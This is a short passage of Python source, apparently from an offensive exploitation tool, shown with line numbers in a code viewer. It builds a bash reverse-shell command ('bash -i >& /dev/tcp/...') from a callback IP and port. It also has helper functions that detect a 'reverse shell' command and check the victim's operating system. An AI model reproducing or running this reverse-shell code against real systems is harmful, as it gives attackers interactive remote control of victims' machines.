(cmd)
| 141 | reverseConn = "bash -i >& /dev/tcp/%s/%s 0>&1" %(ipBack,portBack) |
| 142 | |
| 143 | def checkIfReverseShell(cmd): |
| 144 | if(cmd == "reverse shell" or cmd == "reverseshell"): |
| 145 | return True |
| 146 | return False |
| 147 | |
| 148 | def checkIfWindows(path): |
| 149 | if(victimOs == "Windows" or (len(path) > 0 and "\windows\system32" in path.lower())): |
no outgoing calls
no test coverage detected